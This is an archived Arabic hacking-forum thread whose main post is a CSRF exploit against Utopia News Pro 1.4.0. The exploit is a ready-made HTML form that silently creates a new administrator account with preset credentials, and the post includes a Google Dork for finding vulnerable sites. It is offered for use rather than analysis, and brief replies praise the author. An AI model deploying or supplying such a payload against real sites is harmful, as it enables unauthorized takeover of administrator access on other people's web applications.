:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   حقن xss - ssi (http://www.vbspiders.com/vb/f427.html)
-   -   Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability (http://www.vbspiders.com/vb/t61793.html)

Dr.NaNo 04-09-2012 12:26 AM
Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability
 
بسم الله الرحمن الرحيم.
السلام عليكم ورحمه الله وبركاته.

كود:
# Exploit Title: Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability
# Date: 7/4/2012
# Author: Dr.NaNo
# Software Link: http://www.utopiasoftware.net/newspro/dl.php?file****=newspro140b.zip&mirror=1
# Version: 1.4.0
# Tested on: Linux-Red-Hat
# Google Dork: Powered By Utopia News Pro 1.4.0
#
########################################################
#                      ~ Exploit ~                    #
########################################################
 
<html>
<****>
<form action="http://localhost/{PATh}/upload/users.php" method="post" />
<input type="hidden" ****="user****" value="NANO" />
<input type="hidden" ****="groupid" value="1" />
<input type="hidden" ****="password" value="102030" />
<input type="hidden" ****="password2" value="102030" />
<input type="hidden" ****="email" value="security@security.com" />
<input type="submit" ****="submitnew" accesskey="s" value="ThankS !" />
</form>
</****>
</html>
 
#### ~ Greetz ~ #########################################################
#                                                                      #
# Dr.WEP , JIKO , ahwak2000 , RENO , ABU NWAF , Dr.HAiL , snc0pe , 020  #
#                                                                      #
# JaBrOt HaCkEr , alkaseer20 , SadHaCkEr , Cyber Code , aircrack -ng    #
#                                                                      #
############################################### ~ All FriendS ~ #########
.More

anassrc3 04-09-2012 12:30 AM
رد: Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability
 
الا يوججد شرح يا اخي

خالد سعودي 04-09-2012 12:42 AM
رد: Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability
 
انت وحش منزل ثغرة في سكورتي

max alhawali 06-05-2015 08:42 PM
رد: Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability
 
thank u


الساعة الآن 12:49 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0